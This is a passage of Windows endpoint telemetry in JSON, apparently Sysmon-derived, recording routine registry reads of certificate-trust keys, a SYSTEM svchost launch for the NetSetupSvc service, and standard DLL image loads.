"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupApi.dll", - "image_path": "C:\\Windows\\System32\\NetSetupApi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupEngine.dll", - "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573793230000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 1332, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883573793580000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": 
"{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793550000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - 
{ - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": 
"C:\\Windows\\System32\\powrprof.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793700016, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupApi.dll", - "image_path": 
"C:\\Windows\\System32\\NetSetupApi.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 1332, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573793860000, - "unique_pid": 
"{42FC7E13-CC03-5C05-0000-001097AE5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
